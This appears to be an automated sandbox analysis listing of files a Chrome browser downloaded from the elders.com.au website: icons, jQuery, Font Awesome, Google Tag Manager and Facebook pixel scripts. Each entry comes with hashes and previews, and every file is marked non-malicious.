                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg
                                                                                                                                    Preview:<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.5934C12.0834 18.9152 12.0834 19.4368 11.7497 19.7586C11.4159 20.0805 10.8749 20.0805 10.5411 19.7586L1.13921 10.6938C0.805448 10.372 0.805448 9.85034 1.13921 9.52854L10.5411 0.463673C10.7082 0.302565 10.9266 0.222218 11.1454 0.222218Z" fill="#9E9FA2"/>.</svg>.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (511)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1271
                                                                                                                                    Entropy (8bit):5.184130085081704
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2Q+Bvk+oX/IP2iJyep9Mf9MWIMyMZ2iJRcM2n3k2RRnDbLMWhTtMXy99MJVOfMsX:P/1op9M1MTMyMIjM23pbD/MUtMXy99M0
                                                                                                                                    MD5:0A6AFF292F5CC42142779CDE92054524
                                                                                                                                    SHA1:7A4B1CB962793F47ED138A8DF2D5E4D49E73335A
                                                                                                                                    SHA-256:C250924012FDC9EA9516B30650895201CD167DBD49C9D148924F30881ABFA393
                                                                                                                                    SHA-512:A9934DC7FFF0FA59069A815C3CF795148E9A36759017037DEF66E6A228D650139FD364A004DA7A8F0706E4B28E7AA1F63A8B5F7A3BD0270369EAE9AF82D64403
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:(function(){window.CQ=window.CQ||{};window.CQ.CoreComponents=window.CQ.CoreComponents||{};window.CQ.CoreComponents.container=window.CQ.CoreComponents.container||{};window.CQ.CoreComponents.container.utils={};window.CQ.CoreComponents.container.utils={removeUrlHash:function(){history.replaceState(void 0,void 0," ")},updateUrlHash:function(a,b,c){a&&a._elements&&a._elements[b]&&a._elements[b][c]&&a._elements[b][c].id&&history.replaceState(void 0,void 0,"#"+a._elements[b][c].id)},getDeepLinkItemIdx:function(a,.b,c){if(window.location.hash){var d=window.location.hash.substring(1);if(d&&document.getElementById(d)&&a&&a._config&&a._config.element&&a._elements[b]&&a._config.element.querySelector("[id\x3d'"+d+"']"))for(var e=0;e<a._elements[b].length;e++){var g=a._elements[b][e],f=!1;a._elements[c]&&(f=(f=a._elements[c][e])&&f.querySelector("[id\x3d'"+d+"']"));if(g.id===d||f)return e}}return-1},getDeepLinkItem:function(a,b,c){c=window.CQ.CoreComponents.container.utils.getDeepLinkItemIdx(a,b,c);
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):198
                                                                                                                                    Entropy (8bit):5.01142858375393
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:tRBRNq8Ns+IjSKcvSuXF4q7SLvDmJS4RKb58FNQrFuHrQddQ1Eo6GSyrJVAej+Kh:tnrrzSuzumc4slZRIkfEJVRnGhk5
                                                                                                                                    MD5:9D9473FD130B0A7C6B8E9AF9E592519B
                                                                                                                                    SHA1:0C03C3B2C9895B24902BF0E56B4DCBBEAB3623AF
                                                                                                                                    SHA-256:DC4EE6726A4F0D64C20C6C287B4D05A81462E66D4CCE140DDF74041CC86CEC36
                                                                                                                                    SHA-512:7DF3656954DD331CA2ADAF0EFFF513B9F74FB05D3E2FEE76A940C7574CA62FB0CEE6F7698AC1EE2BE6D9ED9D089B7EEAED7049BF59C82EE2B32CA3221732CB11
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-right-chevron-red.svg
                                                                                                                                    Preview:<svg width="7" height="12" viewBox="0 0 7 12" fill="none" xmlns="http://www.w3.org/2000/svg">. <path d="M5.05885 6L0 1.10035L1.13634 0L7 6L1.13634 12L0 10.8997L5.05885 6Z" fill="#D21E24"/>.</svg>
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2345)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):200761
                                                                                                                                    Entropy (8bit):5.529022034916857
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:QPwizDGLETrtJA0f5yptcY0/H8+bEQDmKD0C8rT/Xy:qGLgrtPYjWx0C8rT/i
                                                                                                                                    MD5:4EBCD0AF5BBAF22E70D238B1DA7645E1
                                                                                                                                    SHA1:3DF411D4F0AE4B7DC6B3D9E0AB007A0333E0951C
                                                                                                                                    SHA-256:3A3535D12E9EB99FDCF499FA1F3AB7BA380EB74A3D9A3D80A3E5CC5FF9A9C04A
                                                                                                                                    SHA-512:106D1662051062ECF67962F933D4085956C75226C393A4F885EE30D802EA953D49ACE9FFC8BD523402003D2018199FD1181CCDC482B8F7107BF000F1F5431297
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-MR5ZTSCQ
                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__mf","metadata":["map"],"once_per_event":true,"vtp_projectId":"b953cf15-e568-418d-a9cb-1ea0cf6357a5","tag_id":4}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. ,[50,"__mf",[46,"a"],[41,"h"],[52,"b",["require","createQueue"]],[52,"c",["require","inj
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):555
                                                                                                                                    Entropy (8bit):7.377837241745018
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/7j/6Ts/CL0GLt/VSoxHaeDzxLNHGOmCvH1mF2aJVhmunTU:u/6z0GL9VSoxHN3xLNHGOzvHsFLqwTU
                                                                                                                                    MD5:109D055C7F1557CEE036E5BCF7E16030
                                                                                                                                    SHA1:2137ED0ED2E8A90FB2E0CC1458C278CD540EBEFD
                                                                                                                                    SHA-256:2E75CD7584C5561BD6CFBFF760686A093CABF74A4D8A73DC49A91C19F89D0E81
                                                                                                                                    SHA-512:65B8C35792174766DC2C6B956C0B45011E7717D17CA2E1CEDA3B2BB071B934884E58B6F024E7B095AAF8BC8E6BBA25A2417F3591062C4E9A2CD8C309B9E0C430
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/find-expert.png
                                                                                                                                    Preview:.PNG........IHDR..............l;....pHYs.................sRGB.........gAMA......a.....IDATx..T1V.@..Y...Y./>..r...z.<.z...z...z...........`...q..6.H,...f....AH..N.H.8......!..2.z..b...+...S."... .Ea......i]'."..m.c...Y.....V8P.N.n.6.hds'.XD"...f..&q{.3.]..Z..l..2./.._...F,Yl...x,>.....Q..3....E.Ig..3..3\ Mw.n..-W.D...-.E....7..0....#..PovOkv.|e..6..=?...f..Qq2w,.....uo.(..!.M...v.<4..%V8$.=-.=...\B..)Pw=...'4.....(..je^..0I>xs.iWl..s..X6~.j..d...*....l...|...K..@.sH..u5.... j...=.<M......;ljID..l=-.....C,..........IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (760)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):101682
                                                                                                                                    Entropy (8bit):5.4801097429116385
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:uyefSIz4emwRsSragavOIYdD3ise8Ux+rHi:uPfTz4emSD3o8Ux+rHi
                                                                                                                                    MD5:F9E8E8C279BAF6A1A278042AFE4F395A
                                                                                                                                    SHA1:D2631D76F948170994789F4C449098EF8A1160AE
                                                                                                                                    SHA-256:AC9C69C1F6DF29993331F7E3F9B7EC6D343575D60F4A5795456422E33BCF15D2
                                                                                                                                    SHA-512:24DA116ACBB4BCCE90B5DB29BAD1B65E84401E97358194A688C75ABC3AB34D4AEB4A2F918A3E15B42BB715FA160827A06FEBC33E8C382BA8058DB58DF3A159D5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js
                                                                                                                                    Preview:/*. jQuery JavaScript Library v1.12.4-aem. http://jquery.com/.. Includes Sizzle.js. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2016-05-20T17:17Z. Sizzle CSS Selector Engine v2.2.1. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2015-10-17. jQuery requestAnimationFrame - 0.2.2 - 2016-10-26. https://github.com/gnarf37/jquery-requestAnimationFrame. Copyright (c) 2016 Corey Frang; Licensed MIT */.(function(y,na){"object"===typeof module&&"object"===typeof module.exports?module.exports=y.document?na(y,!0):function(ja){if(!ja.document)throw Error("jQuery requires a window with a document");return na(ja)}:na(y)})("undefined"!==typeof window?window:this,function(y,na){function ja(a){var b=!!a&&"length"in a&&a.length,d=c.type(a);return"function"===d||c.isWindow(a)?!1:"array"===d||0===b||"number"===typeof b
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65321)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):96614
                                                                                                                                    Entropy (8bit):4.750153610655337
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
                                                                                                                                    MD5:4CA760F49CD8A14911C81E6C14328874
                                                                                                                                    SHA1:81687E7A5DBBA470120798CF05DC31E8D57F0B11
                                                                                                                                    SHA-256:F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
                                                                                                                                    SHA-512:BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2485)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):25552
                                                                                                                                    Entropy (8bit):5.2945880999454396
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYMpR8ZkvuF0vLO+UX6SCK:RIT7sZwuvL54WAcl/78
                                                                                                                                    MD5:10C383937833ACECCD386DDB586C1DF5
                                                                                                                                    SHA1:F16E354938A4012D78FC240140EAF8F3A1899D7E
                                                                                                                                    SHA-256:2D3169A3A072E870CA863AEB87FCE97D821C8B608397309BD64984354A111846
                                                                                                                                    SHA-512:D70130F2BDCED34E85FAC275372A4F17BFC2827E3B2096DFAA65DA18B704293749411086998D8B6C1A48B4EE92C1B74ECFC12B0702A6353C414F4469C5CE21A0
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://connect.facebook.net/signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (511)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):1271
                                                                                                                                    Entropy (8bit):5.184130085081704
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:2Q+Bvk+oX/IP2iJyep9Mf9MWIMyMZ2iJRcM2n3k2RRnDbLMWhTtMXy99MJVOfMsX:P/1op9M1MTMyMIjM23pbD/MUtMXy99M0
                                                                                                                                    MD5:0A6AFF292F5CC42142779CDE92054524
                                                                                                                                    SHA1:7A4B1CB962793F47ED138A8DF2D5E4D49E73335A
                                                                                                                                    SHA-256:C250924012FDC9EA9516B30650895201CD167DBD49C9D148924F30881ABFA393
                                                                                                                                    SHA-512:A9934DC7FFF0FA59069A815C3CF795148E9A36759017037DEF66E6A228D650139FD364A004DA7A8F0706E4B28E7AA1F63A8B5F7A3BD0270369EAE9AF82D64403
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js
                                                                                                                                    Preview:(function(){window.CQ=window.CQ||{};window.CQ.CoreComponents=window.CQ.CoreComponents||{};window.CQ.CoreComponents.container=window.CQ.CoreComponents.container||{};window.CQ.CoreComponents.container.utils={};window.CQ.CoreComponents.container.utils={removeUrlHash:function(){history.replaceState(void 0,void 0," ")},updateUrlHash:function(a,b,c){a&&a._elements&&a._elements[b]&&a._elements[b][c]&&a._elements[b][c].id&&history.replaceState(void 0,void 0,"#"+a._elements[b][c].id)},getDeepLinkItemIdx:function(a,.b,c){if(window.location.hash){var d=window.location.hash.substring(1);if(d&&document.getElementById(d)&&a&&a._config&&a._config.element&&a._elements[b]&&a._config.element.querySelector("[id\x3d'"+d+"']"))for(var e=0;e<a._elements[b].length;e++){var g=a._elements[b][e],f=!1;a._elements[c]&&(f=(f=a._elements[c][e])&&f.querySelector("[id\x3d'"+d+"']"));if(g.id===d||f)return e}}return-1},getDeepLinkItem:function(a,b,c){c=window.CQ.CoreComponents.container.utils.getDeepLinkItemIdx(a,b,c);
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (9217)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):244295
                                                                                                                                    Entropy (8bit):5.4541896576203746
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713FQ:pfLeYc+PJxH8NNfFcrHurPK713K
                                                                                                                                    MD5:4A8563B91911943558554AA6B3016781
                                                                                                                                    SHA1:C2C06261B27F1C03EFEC1AD087FED94FBE5050C1
                                                                                                                                    SHA-256:924F0B32E86FE959E4290F3690D241CC6A24C08A0A4BE56B4D3CE9C2286291BC
                                                                                                                                    SHA-512:0D78AB98DDDB0F7CDB6A7CE20DD24425D1BFC2BC586091B368B45EA7020EB30FD059D28DB9D8DBBDA97439C37292304AE1BB8C1B3A2A51DDAB2D56AED3C09579
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):16
                                                                                                                                    Entropy (8bit):3.75
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:HTzY:zzY
                                                                                                                                    MD5:271C33406833AC99FFA7A58F5D7B6D26
                                                                                                                                    SHA1:FB9DF784770B432F03F83FADC06A4604B41E95DF
                                                                                                                                    SHA-256:2EA92B641D36E8174C1260B0127584E720C65B89C52CA134D2F8B03CD752E373
                                                                                                                                    SHA-512:3B4D4347D291E40357B357B6E68841EFFB00D29610554521112200144E9E746A391975CD2A4CA323B918AB6AFADF17AD62C89136CF0275806D00092B07B6DAE9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmo623_OFkT4RIFDQemLSw=?alt=proto
                                                                                                                                    Preview:CgkKBw0Hpi0sGgA=
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):211
                                                                                                                                    Entropy (8bit):4.969901501689543
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:tIsqDmJS4RKb5nJEWvoXSK7AASKcvXjXRHgAEvlQVA8cXbLErFWFAmYHZAAbBWah:tI9mc4slnJ/wXDcA4noZcR3mqZllWq4I
                                                                                                                                    MD5:E4765EF64FAAF1BFA94BC2D68A3B16E2
                                                                                                                                    SHA1:70EA0BEA959B765AF8A9874170CF71AEE903EDA0
                                                                                                                                    SHA-256:493A230BCE655674730B4F4AFD752658F24C0FE643001DAD61C1EE99D070E9C3
                                                                                                                                    SHA-512:355BD63D4BF814925B951DBFA950079378FAFBB7C95F4BABE46E0588272D866A91B74706C224672B26E32ACC638893C883C8611A5FC183E56575F17E15B65EC9
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg
                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">. <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" />.</svg>
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2485)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):25552
                                                                                                                                    Entropy (8bit):5.2834551676509225
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:so/MPtWU9YwUpxbY/Y3YOgQYeYZYHYZYVY+YSYSyQGr9O3e3Hbb18OAZx:RIT7sZwuvL54WAcl/F
                                                                                                                                    MD5:31333764D0399B68451DD96F402BA540
                                                                                                                                    SHA1:2B0F270EF474C27C8042165D52660918AD54D8FA
                                                                                                                                    SHA-256:32DF8CE52925289E6031567708F3D59E9A22FB9F073B81DBA810D5F29C501E73
                                                                                                                                    SHA-512:7E1C640E84CC75B50341C4C642EDABA9BC2EFE389330E8C38E87BDE0E7CC34D688A83D4802F82CA1B4753E03C1C85B90A66CA6A626186F96F55CD32F92B90F5D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://connect.facebook.net/signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128
                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (3138)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):3284
                                                                                                                                    Entropy (8bit):5.456630983929297
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:PY9+qw87WpFtuOXMfUFyJZAeNeMqOIDcgjHQ0jOpXSHVajXKCw1tngEo:P2+qJWpFtu4MvX0Mb0jOpXOCN
                                                                                                                                    MD5:BB4B6453E3AB80111A2B227318D22EFB
                                                                                                                                    SHA1:B65D59B9AA2B883EBDBE299E9CD40EA4CA642451
                                                                                                                                    SHA-256:9A54E6B1253D785972CCAAB75A888119D13083BFB1F80343AEF9454D5CD5BB6D
                                                                                                                                    SHA-512:FCC97D7E510C9AA9BCB23046271AB83CC0B6BF986B1B03E83E5D5A201FA7DB0B96DA8B54C9192A2D5AF2C5CDB0CA555AFE3A9CFE94F45E4EDF433D7AC203BC98
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_ActivityMap.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_ActivityMap.js`..function AppMeasurement_Module_ActivityMap(e){function t(){var e=s.pageYOffset+(s.innerHeight||0);e&&e>+f&&(f=e)}function n(){if(l.scrollReachSelector){var t=e.d.querySelector&&e.d.querySelector(l.scrollReachSelector);t?(f=t.scrollTop||0,t.addEventListener("scroll",(function(){var e;(e=t&&t.scrollTop+t.clientHeight||0)>f&&(f=e)}))):0<g--&&setTimeout(n,1e3)}}function r(e,t){var n,r,i;if(e&&t&&(n=l.c[t]||(l.c[t]=t.split(","))))for(i=0;i<n.length&&(r=n[i++]);)if(-1<e.indexOf(r))return null;return e}function i(t,n,r,i,a){var c,o;if((t.dataset&&(o=t.dataset[n])||t.getAttribute&&((o=t.getAttribute("data-"+r))||(o=t.getAttribute(r))))&&(c=o),!c&&e.useForcedLinkTracking&&a){var l;if(t=t.onclick?""+t.onclick:"",n="",i&&t&&0<=(r=t.indexOf(i))){for(r+=i.length;r<t.length;)if(o=t.charAt(r++),0<="'\"".indexOf(o)){l=o;break}for(var s=!1;r<t.length&&l&&(o=t
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1226
                                                                                                                                    Entropy (8bit):4.647801139486787
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:tYU/dutm7ivbWXQ8N4+2NGqRB7tFHPbUla35cFsJcrEKHb:n/TWvaqR5fHTYa35cua
                                                                                                                                    MD5:5FEF43A945FA6C8242FC795D0C8DDC9D
                                                                                                                                    SHA1:752A33F4C5B89F7E2C02B5A8EE5EF6089924C392
                                                                                                                                    SHA-256:911E4F035C61ADBB2CDCE5A5C1DAAB5763DFB6C5A1880A0EEA308741CA2126C5
                                                                                                                                    SHA-512:9A4D4A6E2ED578437626727DC6231D781507103AC22F8B994A906DBFC46B30AF784B7C37DD1238FFA01122728E699DDCC56932B6436C120ED0C4231D6647AACE
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
